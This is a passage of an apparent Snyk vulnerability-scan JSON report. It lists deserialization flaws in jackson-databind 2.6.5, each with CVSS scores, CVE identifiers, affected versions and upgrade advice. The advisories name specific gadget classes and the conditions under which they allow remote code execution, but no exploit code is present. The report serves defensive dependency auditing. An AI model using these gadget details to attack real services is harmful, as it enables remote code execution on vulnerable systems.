"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:32.899468Z" - } - 
], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T14:43:42.115110Z", - "functions_new": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - 
"functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-16T14:37:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T14:37:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:32.899468Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": 
"GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:50.462784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. 
An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16942" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx7p-6679-8g3q" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:02:18.178548Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": 
"CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.988000Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": 
"2024-03-11T09:52:13.709990Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.814203Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16943" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fmmc-742q-jg75" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:03:39.391997Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - 
"severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.024581Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2460", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:04.701685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", - "epssDetails": { - "percentile": "0.85119", - "probability": "0.01174", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17267" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f3j5-rmmp-3fc5" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-07T10:05:31.629572Z", - "functions_new": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-07T01:14:26Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-07T01:14:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.064844Z", - 
"socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Zhangxianhui" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Blog Post" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2498", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": 
"2024-03-11T09:53:53.918541Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:58.282653Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", - "epssDetails": { - "percentile": "0.80301", - "probability": "0.00690", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17531" - ], - "CWE": [ - 